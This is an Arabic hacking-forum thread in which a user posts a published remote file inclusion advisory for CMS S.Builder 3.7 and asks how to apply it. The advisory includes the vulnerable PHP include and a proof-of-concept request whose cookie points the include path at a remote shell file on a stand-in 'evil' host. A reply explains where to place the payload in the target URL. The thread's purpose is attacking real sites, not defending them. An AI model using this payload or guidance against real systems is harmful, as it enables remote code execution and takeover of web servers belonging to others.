سؤال:: تطبيق ثغرة

AngelHeart Crew · 09-20-2009, 12:21 PM

السلام عليكم
اريد معرفة كيف اطبق هذه الثغرة

كود:

CMS S.Builder <= 3.7 RFI Vulnerability


Information:

Vendor: http://www.sbuilder.ru
Affected versions: 3.7 and possibly later versions


Description:

The engine of this cms makes site files (index.php, etc) with code like:

---[ PHP Code:

if (!isset($GLOBALS['binn_include_path'])) $GLOBALS['binn_include_path'] = '';
...
include_once($GLOBALS['binn_include_path'].'prog/pl_menu/show_menu.php');
...

-----

If register_globals=On, attacker can write remote url (if allow_url_fopen=On) or local path into variable binn_include_path.


PoC:

---[ HTTP Request:

GET /index.php HTTP/1.1
Host: www.site.com
c o o k i e: binn_include_path=http://evil.site.com/shell.txt?

-----


# by cr0w 
# http://cr0w-at.blogspot.com

# milw0rm.com [2009-03-09]

3xplo!t :

كود:

binn_include_path=http://evil.site.com/shell.txt?

هاد الرابط وين بدي احطه
بعد رابط الموقع
ام بعد الاندكس ؟؟؟

---------------------

يرجى نقل موضوعي الى هذا القسم وبعتذر لانو كتبته في المكان الخاطئ

http://www.vbspiders.com/vb/t20427.html
---------------------

THE WARRIOR · 09-22-2009, 02:08 AM

اخى ضعه بعد الموقع يعنى زى هك
http://www.vbspiders.com/binn_includ...com/shell.txt?

AngelHeart Crew · 09-24-2009, 06:47 PM

شكرا للتوضيح

تحياتي

mox5500 · 09-22-2013, 09:13 PM

ما تتعب نفسك

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
مشكلة عند تطبيق ثغرة اللوكل فيل انكلود	medoo_mohamed	جـــ'ابات العناكــ'ب	2	04-04-2018 08:50 PM
ثغرة ميتا جديدة لإختراق ويندوز فيستا + شرح استغلالها , تحميل الميتا الجديد ! 500 ثغرة :]	Hαcĸer'ѕ Kιɴɢ	قســم إختــراق الأجهــزة	4	11-27-2010 04:01 AM
تطبيق دروس الدورة	الشبح المرح	SQL قواعد البيانات	8	02-20-2010 10:37 PM
تطبيق على الدرس الرابع من الدورة	MasTer MiND	Hackers Showoff	5	07-24-2009 12:26 AM